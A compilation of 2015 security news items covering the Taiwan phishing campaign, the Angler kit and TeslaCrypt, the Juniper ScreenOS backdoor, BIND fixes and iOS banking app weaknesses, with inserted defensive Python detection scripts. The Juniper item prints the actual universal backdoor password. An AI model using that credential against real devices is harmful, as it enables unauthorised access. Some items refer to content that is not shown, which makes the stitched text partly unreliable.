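The FireEye report above describes the delivery chain: a Word attachment whose embedded EPS image triggers a use-after-free in Word's EPS filter, chained with CVE-2015-1701 for local privilege escalation, and then a downloader or backdoor. Because the initial trigger is EPS inside an Office Open XML package, a cheap first-pass triage is to check every .docx in a phishing queue for EPS content. The function below is an added example written for this page, not FireEye's tooling; the two sample packages it inspects are constructed in memory, and their content-type markup is a minimal stand-in for a real document's `[Content_Types].xml`. It looks at part names, declared content types and, because an attacker can rename a part, the first bytes of each part (the ASCII `%!PS-Adobe` header or the binary DOS EPS magic `C5 D0 D3 C6`).

```python
"""Triage an Office Open XML (.docx) package for embedded EPS content."""
import io
import re
import zipfile
from typing import Dict, List

EPS_ASCII_MAGIC = b"%!PS-Adobe"                     # ASCII EPS / PostScript header
EPS_DOS_MAGIC = bytes.fromhex("C5D0D3C6")          # DOS EPS binary (preview) header
POSTSCRIPT_CT = re.compile(rb"application/postscript", re.I)


def find_eps_parts(docx_bytes: bytes) -> Dict[str, List[str]]:
    """Return {part_name: [reasons]} for everything in the package that looks like EPS.

    Raises zipfile.BadZipFile if the input is not a zip at all (e.g. an old binary .doc).
    """
    hits: Dict[str, List[str]] = {}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for info in zf.infolist():
            reasons = []
            if info.filename.lower().endswith(".eps"):
                reasons.append("eps extension")
            with zf.open(info) as part:
                head = part.read(16)                 # magic bytes, not the whole part
            if head.startswith(EPS_ASCII_MAGIC):
                reasons.append("ascii EPS header")
            if head.startswith(EPS_DOS_MAGIC):
                reasons.append("DOS EPS binary header")
            if reasons:
                hits[info.filename] = reasons
        try:
            content_types = zf.read("[Content_Types].xml")
        except KeyError:
            content_types = b""
        if POSTSCRIPT_CT.search(content_types):
            hits.setdefault("[Content_Types].xml", []).append("declares application/postscript")
    return hits


def is_suspicious(docx_bytes: bytes) -> bool:
    """True if any EPS indicator is present; a hit means detonate/inspect, not auto-block."""
    return bool(find_eps_parts(docx_bytes))


def build_sample_docx(parts: Dict[str, bytes]) -> bytes:
    """Build an in-memory zip shaped like a .docx (constructed sample data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in parts.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Minimal stand-in for [Content_Types].xml; %s receives extra <Default> entries.
CT_BASE = (b'<?xml version="1.0"?>'
           b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
           b'<Default Extension="xml" ContentType="application/xml"/>%s</Types>')

BENIGN_DOCX = build_sample_docx({
    "[Content_Types].xml": CT_BASE % b'<Default Extension="png" ContentType="image/png"/>',
    "word/document.xml": b"<w:document/>",
    "word/media/image1.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
})

SUSPICIOUS_DOCX = build_sample_docx({
    "[Content_Types].xml": CT_BASE % b'<Default Extension="eps" ContentType="application/postscript"/>',
    "word/document.xml": b"<w:document/>",
    "word/media/image1.eps": b"%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: 0 0 10 10\n",
    "word/media/image2.jpg": EPS_DOS_MAGIC + b"\x00" * 28,   # EPS renamed to .jpg
})

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DOCX), ("suspicious", SUSPICIOUS_DOCX)):
        print(f"{label}: suspicious={is_suspicious(doc)} {find_eps_parts(doc)}")
```

EPS in ordinary business correspondence is rare, so a hit is a good reason to route the attachment to a sandbox and look for the follow-on stages the report describes; it is not, on its own, proof of malice.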

The representatives of the main opposition Democratic Progressive Party (DPP) appear to enjoy the favor of voters at the expense of the parties whose politics are closer to the Chinese Government.


In the past, Taiwanese government websites were constantly under attack from China; now experts at FireEye have identified a nation-state actor running a spear phishing campaign against Taiwanese journalists earlier this month, with the subject line reading “DPP’s Contact Information Update”.

“Each phishing message contained the same malicious Microsoft Word attachment. The malicious attachment resembled an article hosted on a legitimate Japanese defense-related website, as both discussed national defense topics and carried the same byline. The lure documents also used the Japanese calendar, as indicated by the 27th year in the Heisei period. This demonstrates that the threat actors understand conventional Japanese date notation.”

In March, the DPP’s website was brought down and remained offline for at least four days; in that case too, experts blamed Chinese hackers.

“We often received fake emails pretending to come from our colleagues, asking us to click some links or download some documents,” said Ketty Chen, deputy director of the DPP’s international affairs department.

Analyzing the TTPs of the threat actors, the experts at FireEye confirmed the Chinese origin of the threat and its intention to gather information relating to the upcoming election.

“Given the timing of these attacks, the reporters targeted, and the information used as a lure, it is possible that the attackers are seeking information relating to the upcoming election and about the DPP in particular,” Bryce Boland, chief technology officer for Asia Pacific at FireEye, told Agence France-Presse.

Taiwan, and the Democratic Progressive Party in particular, is in a state of emergency: its politicians are a prime target for alleged state-sponsored hackers.

A DPP official working for the cyber security of the Party, speaking on condition of anonymity, revealed that the organization is “constantly on guard” and conducts regular Internet security training for its staff.

Angler exploit kit includes the code of a recent Flash flaw

A security researcher discovered a new variant of the Angler exploit kit that includes the exploit code for a recently patched Adobe Flash Player flaw.
The French security researcher “Kafeine” has discovered a new variant of the popular Angler exploit kit that includes the exploit code for a recently patched Adobe Flash Player vulnerability (CVE-2015-8446). Kafeine reported that new exploit code was added to the Angler exploit kit on December 14.

The new Angler exploit kit has been used by threat actors in the wild to spread the TeslaCrypt ransomware.

Once the ransomware infects a PC, it encrypts files and renames them with a .vvv extension requesting the payment of a $500 ransom within one week, after which the price to recover the files increases to $1,000.

The CVE-2015-8446 vulnerability is a Flash Player heap buffer overflow flaw that Adobe patched on December 8, and that has since been added to Angler.


This vulnerability was discovered by an anonymous researcher who reported it via the Zero Day Initiative (ZDI). Adobe recently released new Flash Player versions (Desktop Runtime with support for Firefox and Safari) that fix 77 security issues.

Kafeine added that the exploit for the Flash vulnerability has been used by threat actors to deliver the Bedep Trojan Downloader.

Last week experts at Malwarebytes confirmed that the code for the CVE-2015-8446 exploit included in the Angler Exploit kit had been used by cyber criminals to serve the TeslaCrypt ransomware.

Once it infects a computer, the ransomware encrypts files and renames them with a .vvv extension. Victims are instructed to pay $500 within one week, after which the price for the private key needed to recover the files increases to $1,000.

The experts noticed that the new variant of the Angler Exploit Kit had a low detection rate at the time of its discovery.
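The file-renaming behaviour described above (every encrypted file gets a .vvv extension) can be turned into a simple host-based detection. The following is an added example, not code from Kafeine's or Malwarebytes' analyses: it scans a constructed file-event log and raises an alert when one host renames several files to .vvv within a short window. The log format, host names, paths, threshold and window size are all assumptions made for the example.

```python
"""Detect a burst of renames to the .vvv extension (TeslaCrypt) in file-event logs.

Added example. The log format below is constructed for illustration and is not
any product's native format; the threshold and window are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: "<ISO timestamp> <host> <action> <path>[ -> <new path>]"
SAMPLE_LOG = """\
2015-12-14T10:00:01 ws-17 RENAME C:\\Users\\a\\Documents\\report.docx -> C:\\Users\\a\\Documents\\report.docx.vvv
2015-12-14T10:00:01 ws-17 RENAME C:\\Users\\a\\Documents\\budget.xlsx -> C:\\Users\\a\\Documents\\budget.xlsx.vvv
2015-12-14T10:00:02 ws-17 RENAME C:\\Users\\a\\Pictures\\img1.jpg -> C:\\Users\\a\\Pictures\\img1.jpg.vvv
2015-12-14T10:00:02 ws-17 CREATE C:\\Users\\a\\Documents\\readme.txt
2015-12-14T10:00:03 ws-17 RENAME C:\\Users\\a\\Pictures\\img2.jpg -> C:\\Users\\a\\Pictures\\img2.jpg.vvv
2015-12-14T10:00:03 ws-17 RENAME C:\\Users\\a\\Pictures\\img3.jpg -> C:\\Users\\a\\Pictures\\img3.jpg.vvv
2015-12-14T10:05:00 ws-42 RENAME C:\\Users\\b\\draft.txt -> C:\\Users\\b\\draft_final.txt
2015-12-14T10:30:00 ws-42 RENAME C:\\Users\\b\\old.vvv -> C:\\Users\\b\\old.bak
"""


def parse_events(log_text):
    """Parse log lines into (timestamp, host, action, src_path, dst_path_or_None)."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, action, rest = line.split(" ", 3)
        if action == "RENAME":
            src, dst = rest.split(" -> ", 1)
        else:
            src, dst = rest, None
        events.append((datetime.fromisoformat(ts), host, action, src, dst))
    return events


def detect_vvv_bursts(log_text, threshold=3, window_seconds=60):
    """Return [(host, renames_in_busiest_window, window_start_iso)] for hosts
    that renamed at least `threshold` files to .vvv within `window_seconds`.

    A single rename to .vvv is not suspicious on its own; a burst is the signal
    that a ransomware process is walking the file system.
    """
    by_host = defaultdict(list)
    for ts, host, action, _src, dst in parse_events(log_text):
        if action == "RENAME" and dst.lower().endswith(".vvv"):
            by_host[host].append(ts)

    window = timedelta(seconds=window_seconds)
    alerts = []
    for host, times in sorted(by_host.items()):
        times.sort()
        best_count, best_start, left = 0, None, 0
        for right, t in enumerate(times):          # sliding window over sorted times
            while t - times[left] > window:
                left += 1
            count = right - left + 1
            if count > best_count:
                best_count, best_start = count, times[left]
        if best_count >= threshold:
            alerts.append((host, best_count, best_start.isoformat()))
    return alerts


if __name__ == "__main__":
    for host, count, start in detect_vvv_bursts(SAMPLE_LOG):
        print("ALERT: %s renamed %d files to .vvv starting %s" % (host, count, start))
```

The window-based count is what keeps the rule quiet on ws-42, whose renames are either not to .vvv or too sparse; in production the same logic runs over file-audit or EDR events, and the host should be isolated as soon as the alert fires, since the ransomware is still running.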

Iranian hackers penetrated computers of a small dam in NY

Iranian hackers penetrated the industrial control system of a dam near New York City in 2013, raising concerns about the security of US critical infrastructure.
It is official: Iranian hackers breached the online control system of a New York dam in 2013. According to reports, the hackers penetrated the control system of the dam and poked around inside the system.

The Wall Street Journal reported that hackers penetrated the system of the critical infrastructure through a cellular modem. The Journal cited an unclassified Homeland Security summary of the case. At the time of writing, the Department of Homeland Security had declined to comment on the cyber attack.

The Wall Street Journal cited anonymous sources who revealed that the hackers targeted the Bowman Avenue Dam, a small facility 20 miles outside of New York.

“It’s very, very small,” Rye City Manager Marcus Serrano told the newspaper, confirming that FBI agents investigated the case in 2013.

Fortunately, the intruders were not able to gain complete control of the control systems.

The hackers used a machine that scanned the Internet for vulnerable US industrial control systems (ICS), but the strange circumstance is that the threat actors appeared to be focusing on a specific range of internet addresses.


Once the attack was discovered, US cyber experts traced the intruders; the evidence collected suggests the involvement of Iranian hackers, probably the same groups that have focused their operations on American companies and organizations.

Exactly one year ago, the experts at security firm Cylance revealed that Iranian hackers were targeting airlines, energy and defense companies worldwide as part of the Operation Cleaver campaign.

The fact that foreign hackers target US critical infrastructure is nothing new: a report issued by the Department of Homeland Security (DHS) in November 2014 revealed that Russian hackers had infiltrated several critical infrastructure systems in the United States.

The US has the highest number of ICS and SCADA systems exposed on the internet, and many of them are easily identifiable with search engines like Shodan or Censys. Researchers at Shodan recently revealed that the US has nearly 57,000 industrial control systems connected to the Internet.

A recent wave of attacks conducted by Iranian hackers came after a period of apparent calm. Security experts noticed an evolution in the TTPs of the Iranian hackers: initially focused on targets in the financial industry, their activities were limited to sabotage and disruption of the targeted infrastructure, as in the attack on the casino company Las Vegas Sands Corp.

The recent attacks against the State Department are clearly a cyber espionage operation; they were initially attributed to Chinese hackers who may have infiltrated the department’s unclassified e-mail systems. Recall that security experts at Facebook were the first to notice the intrusion of Iranian hackers into the e-mail accounts of US State Department officials focused on Iran.

Needless to say, threat intelligence activities are essential to preventing such incidents and mitigating cyber threats.

HTTP has a new status code, 451. Webmasters should dread it

In recent years the number of websites shut down by official order has grown, for instance for copyright infringement, criminal activity (child pornography, drug sales) and the like. Such sites often simply stopped working, although in the US at least an official explanation was often displayed on them. That was also the case with Megaupload.

For many months this notice about the seizure and investigation was displayed at the address. Now it is silent.

The IETF has now finally introduced an error code for these cases, so the browser itself will be able to display the explanation. If a web server returns status code 451

The HTTP response header could look like this:

HTTP/1.1 451 Unavailable For Legal Reasons
Link:; rel="blocked-by"
Content-Type: text/html

So the response can also include a link to more information, and the browser can then display its own error message stating that the page was taken down for legal reasons, with the user finding more information at the address given.

Although the status code has not yet been fully approved, its authors say that web servers can already use it routinely; only formalities stand in the way of formal standardization.

Juniper Networks routers contain secret code that decrypts VPN traffic

21.12.2015 Surveillance

The presence of “unauthorized” code for decrypting VPN traffic in Juniper Networks routers is quite a serious problem.
Tags: Backdoor Security Hack Juniper Networks router Encryption VPN
An internal code review at Juniper Networks revealed a very unpleasant situation: “unauthorized code” had made its way into the routers, code that could give a potential attacker administrator access and then allow VPN communications to be decrypted. The problem affects NetScreen devices running ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r14 through 6.3.0r20.

If you use the devices in question, Juniper Networks has already released a fix that should remove this code.

The most interesting aspect of the whole affair is that it may be connected to the reports (see Der Spiegel) about the NSA trying to penetrate Juniper devices in order to obtain backdoor access. In the NSA documents this effort is designated FEEDTHROUGH, and it is supposed to be malware capable of accessing Juniper firewalls and surviving software updates.

The unauthorized code is also currently the subject of a US government investigation, which is also examining the possibility that it was the work of another government or of organized crime.

Juniper Networks has not provided any further details, and finding information about the incident on its website is rather difficult; try 2015-12 Out of Cycle Security Bulletin: ScreenOS: Multiple Security issues with ScreenOS (CVE-2015-7755, CVE-2015-7756), or go directly to CVE-2015-7755 and CVE-2015-7756.

Also interesting and useful is CVE-2015-7755: Juniper ScreenOS Authentication Backdoor, where you will also find the universal password that could be used for access (<<< %s(un='%s') = %u), in a form that makes it easy to overlook.
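The first step for an administrator is simply to find out which firewalls in the estate fall into the affected version ranges. The following is an added example, not Juniper's or Fox-IT's tooling: it parses ScreenOS version strings of the form 6.3.0r19 and checks them against the per-CVE ranges from Juniper's updated statement quoted in the earlier Juniper item (6.3.0r17 to 6.3.0r20 for CVE-2015-7755; 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 for CVE-2015-7756). Note that this Czech item quotes 6.3.0r14 as the lower bound for the 6.3.0 branch, the earlier, broader figure. The inventory host names are constructed.

```python
"""Triage a ScreenOS inventory against the two Juniper CVE version ranges.

Added example. The ranges come from Juniper's updated statement; hosts and
versions in the sample inventory are constructed.
"""
import re

# Inclusive version ranges per CVE, as given in Juniper's updated statement.
AFFECTED = {
    "CVE-2015-7755": [("6.3.0r17", "6.3.0r20")],                       # admin backdoor
    "CVE-2015-7756": [("6.2.0r15", "6.2.0r18"), ("6.3.0r12", "6.3.0r20")],  # VPN decryption
}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)r(\d+)$")


def parse_screenos_version(text):
    """'6.3.0r19' -> (6, 3, 0, 19); raises ValueError on anything else."""
    match = _VERSION_RE.match(text.strip())
    if not match:
        raise ValueError("unrecognised ScreenOS version: %r" % text)
    return tuple(int(part) for part in match.groups())


def affected_issues(version):
    """List of CVE ids whose affected range contains `version` (tuple compare,
    so 6.3.0r9 < 6.3.0r12 even though '9' > '1' as a string)."""
    parsed = parse_screenos_version(version)
    hits = []
    for cve, ranges in AFFECTED.items():
        for low, high in ranges:
            if parse_screenos_version(low) <= parsed <= parse_screenos_version(high):
                hits.append(cve)
                break
    return hits


def triage(inventory):
    """inventory: {hostname: version string} -> {hostname: [affected CVEs]}.

    Unparseable versions are reported under the key 'error' so a typo in the
    inventory is not silently treated as 'not affected'.
    """
    result = {}
    for host, version in inventory.items():
        try:
            result[host] = affected_issues(version)
        except ValueError as exc:
            result[host] = ["error: %s" % exc]
    return result


# Constructed sample inventory.
SAMPLE_INVENTORY = {
    "fw-edge-1": "6.3.0r19",   # both issues
    "fw-branch": "6.3.0r15",   # VPN decryption only
    "fw-lab": "6.2.0r12",      # below the affected range
    "fw-new": "6.3.0r21",      # already patched
    "fw-unknown": "6.3.0",     # malformed entry
}

if __name__ == "__main__":
    for host, issues in sorted(triage(SAMPLE_INVENTORY).items()):
        print("%-12s %s" % (host, ", ".join(issues) or "not affected"))
```

Because the ranges are inclusive on both ends and the comparison is on integer tuples, the boundary releases (r12, r17, r18, r20) are classified correctly; a string comparison would not order r9 and r12 properly.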

New BIND version fixes vulnerabilities

21.12.2015 Vulnerabilities

The new BIND versions patch three new vulnerabilities. The most serious of them (CVE-2015-8000) can be exploited to launch a DoS attack against servers answering recursive queries. According to ISC experts, an attacker can use a deliberately malformed query attribute to force the named process to terminate and thereby cause a service outage. The risk for recursive DNS servers is rated as high. Authoritative servers may also be partially affected, namely if they perform authentication during recursive queries related to resolving the addresses of the servers listed in an NS RRSET. The vulnerability is remotely exploitable and has been classified as critical, although ISC is not aware of any active exploit for it.

The second of the security holes fixed in the new BIND versions is a race condition triggered when handling a socket error. This vulnerability can cause the named process to terminate (CVE-2015-8461). The third fix addresses an OpenSSL vulnerability (CVE-2015-3193). Although no significant exploitation of any of these vulnerabilities has been published so far, DNS servers are a popular target for several types of attack, including DoS, traffic hijacking and response spoofing. For that reason, patching DNS servers should not be taken lightly.

Top 8 Cyber Security Tips for Christmas Online Shopping
Christmas, the most wonderful time of the year, has arrived, and with it the season of online shopping.
According to the National Retail Federation, more than 151 million people shopped in stores, but more than 100 million shopped online during the Cyber Monday sales, and why wouldn't they, given the vast convenience of online shopping?
It is quite visible these days that more and more people are turning to online shopping rather than the malls to buy Christmas gifts.
However, the main question is: is it safe to do so, especially with so many users sharing credit card information online?
Here are some tips to keep in mind before providing your credit card number and clicking 'BUY':
1. DO NOT CLICK On Suspicious Links
Scammers send malicious links that look more real than the originals. Because these links imitate well-known sites such as eBay and Flipkart, many online users fall victim.
The safest way to avoid being tricked is NOT to open such links when they arrive via social media sites, messages or emails from unknown sources.
2. Keep your Eye on New Vendors
People tend to purchase goods and services from new vendors as they generally give attractive discounts.
However, one should always be wary of such vendors, as customers are sometimes trapped and exploited easily.
One of the main problems is FAKE CUSTOMER REVIEWS. Never rely entirely on company or seller review information.
Always double-check the things that matter, including product purpose and suitability, materials and construction, quality, and other points like speedy shipping, prompt refunds, and returns.
Always start with small purchases and only then move on to larger ones.
Always look before you leap.
Search online for other people's experiences, including on sites like and others.
3. Always Use Strong Passwords
This tip is one of the most obvious, but people generally do not follow it.
Avoid easy-to-crack passwords by including a combination of upper- and lowercase letters, numbers and special characters in your password.
Avoid the most common passwords, like your name, 123456 and password.
Most importantly, don't use the same password for multiple sites.
4. Always Use Secured Websites
Before typing sensitive information online, make sure the website you are visiting is a secure site.
Secure sites show a closed padlock in the status bar, and their URL starts with HTTPS, which means:
Communication is encrypted
SSL verifies authenticity
5. Avoid Using Debit Cards, Instead Use Credit Cards
For online shopping purposes, using a credit card is always considered a comparatively better option than using a debit card.
If someone manages to intercept your financial information online, they can do less damage.
Credit cards have spending limits, but debit cards do not.
Credit cards should also be used with low credit limits, or with the "one-time use" option that some banks offer.
You can even make use of virtual credit cards that are specifically designed for online shopping only.
6. Important Things to Remember While Shopping
Always keep documentation of your online purchases; usually an email is sent to the customer confirming the order.
Every customer should print the document or save it somewhere safe until the order is received.
Moreover, it is always advisable to log off from the retailer's website after making the purchase.
These are always the smarter options to adopt rather than becoming a victim.
7. Do Not Provide Your Details to Every Website You Visit
Online stores offer customers the option to check out as a one-time customer.
If you do not shop regularly on a site, avoid filling in unnecessary information, just to be safe.
8. Check Your Bank Statements Regularly
Most banks now allow you to set up email notifications for any credit card transaction.
If you see any unusual charges, report them and take the steps needed to get a prompt refund.

Facebook knocks out Flash by switching to HTML5!

Step by step, HTML5 is replacing the flawed Flash that hackers have exploited in an impressive number of cyber attacks in the wild.
It helps that Facebook is leaving Flash behind and adopting HTML5 (YouTube did the same in the recent past).

“We recently switched to HTML5 from a Flash-based video player for all Facebook web video surfaces, including videos in News Feed, on Pages, and in the Facebook embedded video player. We are continuing to work together with Adobe to deliver a reliable and secure Flash experience for games on our platform, but have shipped the change for video to all browsers by default,” states the announcement issued by Facebook.

“From development velocity to accessibility features, HTML5 offers a lot of benefits. Moving to HTML5 best enables us to continue to innovate quickly and at scale, given Facebook’s large size and complex needs.”

We are big supporters of HTML5, since it eliminates the weakest link in the user environment and, in terms of development, it makes developers’ jobs easier.


Facebook explains the benefits of HTML5 that it will be using:

Development velocity

“Using web technologies allows us to tap into the excellent tooling that exists in browsers, among the open source community, and at Facebook in general. Not having to recompile code and being able to apply changes directly in the browser allow us to move fast.”


“We have an excellent testing infrastructure at Facebook. By moving to HTML5 video, we can avail ourselves of all the web tools in that infrastructure, like jest and WebDriver, at our disposal.”


“HTML5 made it possible for us to build a player that is fully accessible to screen readers and keyboard input. We can leverage the accessibility tools that HTML5 provides to make it easier for people with visual impairments to use our products. Making Facebook accessible to everyone is an important part of our mission to make the world more open and connected.”

When making such a big move, there are challenges that need to be overcome, and Facebook is no exception; for that reason Facebook needed to address:

Getting logging right

“To ensure logging correctness, we created a test suite that performs the same user-interaction scenarios against both video players and then validates that the logs are equivalent. This way we had high confidence in the data that our new HTML5 video player reports.”

Browser bugs

“One of the major issues we wanted to solve before shipping the HTML5 player was the number of bugs in various browsers around HTML5 videos. One specific bug in Chrome’s implementation of the SPDY protocol caused the browser to simply stop loading and playing videos in News Feed. We determined that the issue was triggered by loading too many videos concurrently, so we reduced the number of videos we load at the same time and make sure we cancel loading videos as soon as they are no longer required.”

Worse performance in older browsers

“In theory, most browsers in use support HTML5 video. However, in practice we noticed that a lot of the older browsers would simply perform worse using the HTML5 player than they had with the old Flash player. We saw more errors, longer loading times, and a generally worse experience. We decided to initially launch the HTML5 player to only a small set of browsers, and continuously roll out to more browsers, versions, and operating systems as we improved it and fixed small bugs. That’s why we waited until recently to ship the HTML5 player to all browsers by default, with the exception of a small set of them.”

Page load time regression

“The last major issue we faced while launching the HTML5 player was a regression in the time it takes to load Facebook. At Facebook, we care about the experience we provide to people. How long Facebook takes to load is a contributing factor we look at to gauge user experience. When we shipped the HTML5 player, we noticed that on average it took slightly longer for Facebook to load. By fixing several small performance regressions and making multiple micro-optimizations, we finally reached a level we felt happy with shipping.”

As said before, this can be a huge improvement for users but also for developers. On the user side, they will have an improved video experience: videos will start playing faster, which is good.

It is good that big companies like Facebook and Google are adopting HTML5, forcing other websites to switch to HTML5 sooner or later and making everyone a bit safer.

iOS Mobile Banking Apps: what has changed since the 2013 tests?

The security expert Ariel Sanchez presented the results of tests conducted on 40 iOS banking apps, comparing them to those obtained 2 years ago.
The banking industry is looking with increasing interest at the mobile platform, and financial institutions are offering a growing number of services accessible through mobile devices, but what about security?

The security of mobile banking apps has improved over the last few years, but there is still great scope for improvement.

Ariel Sanchez, a security consultant at IOActive, conducted research two years ago on the security implemented by iOS banking apps and has now decided to repeat the same tests. Sanchez evaluated the security level of 40 iOS banking apps and discovered a number of security weaknesses or vulnerabilities. The expert limited his analysis to the client side, without investigating the security offered on the server side.

For obvious reasons, Sanchez has not revealed the names of the apps or of the banks that developed the mobile apps he tested.

What has changed?

Revisiting his research, Sanchez found that many of the problems that emerged two years ago remain, even though the overall level of security has increased. Sanchez executed the following tests on each app:

Transport Security
    Plaintext traffic
    Improper session handling
    Properly validate SSL certificates
Compiler Protection
    Anti-jailbreak protection
    Compiled with PIE
    Compiled with stack cookies
    Automatic reference counting
Data validation (input, output)
    UIWebView implementations
Insecure Data Storage
    SQLite database
    File caching
    Property list files
    Log files
        Custom logs
        NSLog statements
        Crash reports files
Binary Analysis
    Disassemble the application
    Detect obfuscation of the assembly code protections
    Detect anti-tampering protections
    Detect anti-debugging protections
    Protocol handlers
    Client-side injection
    Third-party libraries
He discovered that five apps (12.5 per cent) failed to validate the authenticity of the SSL certificates presented, a circumstance that exposes mobile users to Man-in-the-Middle (MiTM) attacks.

35 per cent of the mobile apps contained non-SSL links throughout the application; traffic to these links could be easily intercepted by attackers, who could also inject arbitrary JavaScript/HTML code in an attempt to create a fake login prompt.

30 per cent of the iOS apps failed to validate incoming data, a circumstance that potentially allows an attacker to inject JavaScript. The expert noted that this percentage is lower than in the previous tests conducted in 2013.

40% of the apps leak information about user activity or client-server interactions.

“35% of the apps contained non-SSL links throughout the application. This allows an attacker to intercept traffic and inject arbitrary JavaScript/HTML code in an attempt to create fake login prompts or similar scams,” states the post published by Sanchez.

The expert also analyzed the binaries and file system, revealing that 15 per cent of the iOS banking apps store unencrypted data and sensitive information. In some cases customers’ bank accounts and transaction history are stored in SQLite databases on the device or in plain text files.
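Two of the checks from the list above, "Compiled with PIE" and "Plaintext traffic", can be run statically against the app binary without a jailbroken device. The block below is an added example and not IOActive's tooling: it reads the Mach-O header (unwrapping a universal binary into its architecture slices) to test the MH_PIE flag, and scans the image for embedded http:// URLs, which are the non-SSL links Sanchez reports. The Mach-O constants are the public ones from the loader headers; the sample "app" binaries are constructed in-line, with placeholder bank host names, so the audit runs without a real IPA.

```python
"""Static checks for an iOS app binary: PIE flag and plaintext http:// URLs.

Added example (not IOActive's tooling). The Mach-O constants are the public
ones from <mach-o/loader.h> and <mach-o/fat.h>; the sample binaries below are
constructed in-line so the checks run without a real app bundle.
"""
import re
import struct

MH_MAGIC = 0xFEEDFACE      # 32-bit Mach-O, little-endian
MH_MAGIC_64 = 0xFEEDFACF   # 64-bit Mach-O, little-endian
FAT_MAGIC = 0xCAFEBABE     # universal (fat) binary; fat header is big-endian
MH_EXECUTE = 0x2           # filetype: main executable
MH_PIE = 0x00200000        # flag: position-independent executable (ASLR)


def macho_slices(data):
    """Return [(magic, filetype, flags)] for every Mach-O image in `data`.

    A fat binary is unwrapped and each architecture slice inspected: the PIE
    check is only meaningful if *every* slice carries MH_PIE.
    """
    if len(data) < 28:
        raise ValueError("too short to be a Mach-O image")
    if struct.unpack(">I", data[:4])[0] == FAT_MAGIC:
        nfat = struct.unpack(">I", data[4:8])[0]
        slices = []
        for i in range(nfat):
            off = 8 + i * 20                         # sizeof(struct fat_arch) == 20
            _cpu, _sub, offset, size, _align = struct.unpack(">5I", data[off:off + 20])
            slices.extend(macho_slices(data[offset:offset + size]))
        return slices
    magic, _cpu, _sub, filetype, _ncmds, _sizeofcmds, flags = struct.unpack("<7I", data[:28])
    if magic not in (MH_MAGIC, MH_MAGIC_64):
        raise ValueError("not a Mach-O image")
    return [(magic, filetype, flags)]


_HTTP_URL = re.compile(rb"http://[\x21-\x7e]+")   # printable, non-space run after http://


def find_plaintext_urls(data):
    """Sorted unique http:// URLs embedded as strings (https:// never matches)."""
    return sorted({m.group(0).decode("ascii") for m in _HTTP_URL.finditer(data)})


def audit_app_binary(data):
    """Summary a reviewer would log for one app: slice count, PIE verdict, http links."""
    slices = macho_slices(data)
    return {
        "slices": len(slices),
        "pie": all(flags & MH_PIE for _, _, flags in slices),
        "plaintext_urls": find_plaintext_urls(data),
    }


# --- constructed samples (hypothetical apps, placeholder hosts) -------------
def build_sample(flags, strings):
    """Minimal arm64 Mach-O header followed by a NUL-separated string table."""
    header = struct.pack("<8I", MH_MAGIC_64, 0x0100000C, 0, MH_EXECUTE, 0, 0, flags, 0)
    return header + b"\0" * 16 + b"\0".join(strings) + b"\0"


def build_fat(images):
    """Wrap thin images in a big-endian fat header (one fat_arch per image)."""
    offset = 8 + 20 * len(images)
    header, body = struct.pack(">II", FAT_MAGIC, len(images)), b""
    for image in images:
        header += struct.pack(">5I", 0x0100000C, 0, offset, len(image), 0)
        body += image
        offset += len(image)
    return header + body


BASE_FLAGS = 0x85  # MH_NOUNDEFS | MH_DYLDLINK | MH_TWOLEVEL
HARDENED_APP = build_sample(BASE_FLAGS | MH_PIE, [b"https://bank.example/api/login"])
WEAK_APP = build_sample(BASE_FLAGS, [b"http://bank.example/legacy/login", b"https://bank.example/api"])

if __name__ == "__main__":
    for name, blob in (("hardened", HARDENED_APP), ("weak", WEAK_APP), ("fat", build_fat([HARDENED_APP, WEAK_APP]))):
        print(name, audit_app_binary(blob))
```

On a real app the input is the decrypted main executable from the .app bundle; a universal binary with one non-PIE slice is reported as not PIE, because the device may load exactly that slice. The URL scan is a triage aid rather than proof of plaintext traffic, so each hit still needs to be confirmed by looking at where the string is used.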

The following graphs report the results of the tests conducted in 2013 and 2015.

iOS banking apps security test 2013 vs 2015

iOS banking apps security test 2013 vs 2015 2

Most of the apps have improved traffic protection and are properly validating SSL certificates, drastically reducing the exposure to MiTM attacks. It is interesting to note that there is still a high number of apps storing insecure data in their file systems.

Sanchez concluded that although the security implemented by the banking apps has increased, it is still not enough, because many apps remain vulnerable.

“While overall security has increased over the two-year period, it is not enough, and many apps remain vulnerable.” he added.

Enjoy the “(In)secure iOS Mobile Banking Apps – 2015 Edition” report.

AlienVault Unified Security Management: Real-Time Threat Detection Starting on Day 1
As organizations expand their IT infrastructure to match their evolving business models and meet changing regulatory requirements, they often find that their networks have become extremely complex and challenging to manage.
A primary concern for many IT teams is detecting threats in the mountain of event data being generated every day.
Even a relatively small network can generate hundreds or thousands of events per second, with every system, application, and service generating events.
The sheer volume of data makes it virtually impossible to manually identify and link those few events that indicate a successful network breach and system compromise before the exfiltration of data.
The AlienVault Unified Security Management (USM) platform is a solution that helps IT teams with limited resources overcome the challenge of detecting threats in their network.
The USM platform accelerates and simplifies your ability to detect, prioritize, and respond to the most critical threats targeting your network.
It enables any IT or security practitioner to see actionable results on day one and begin to improve their security posture immediately.
What can you do with USM?
All of USM’s built-in security controls are pre-integrated and optimized to work together out of the box. This unified approach eliminates the need for IT teams to configure and maintain numerous security point products.
Within minutes of installing USM, the platform begins generating detailed alerts. Additionally, it provides valuable insights into the assets and threats on your network with the following technologies:
Asset discovery
Vulnerability assessment
Intrusion detection
Behavioral monitoring
Security information and event management (SIEM)
Integrated threat intelligence from AlienVault Labs
This insight provides visibility into the software installed on your devices, their configuration, any vulnerabilities, as well as the specific threats targeting them.
Armed with this detailed threat information, you can focus on responding to the threats instead of trying to collect and analyze the information manually.
Integrated Threat Intelligence
The integrated threat intelligence, powered by AlienVault Labs and OTX, includes continuous updates to the built-in security controls as well as the latest information on emerging threats and bad actors.
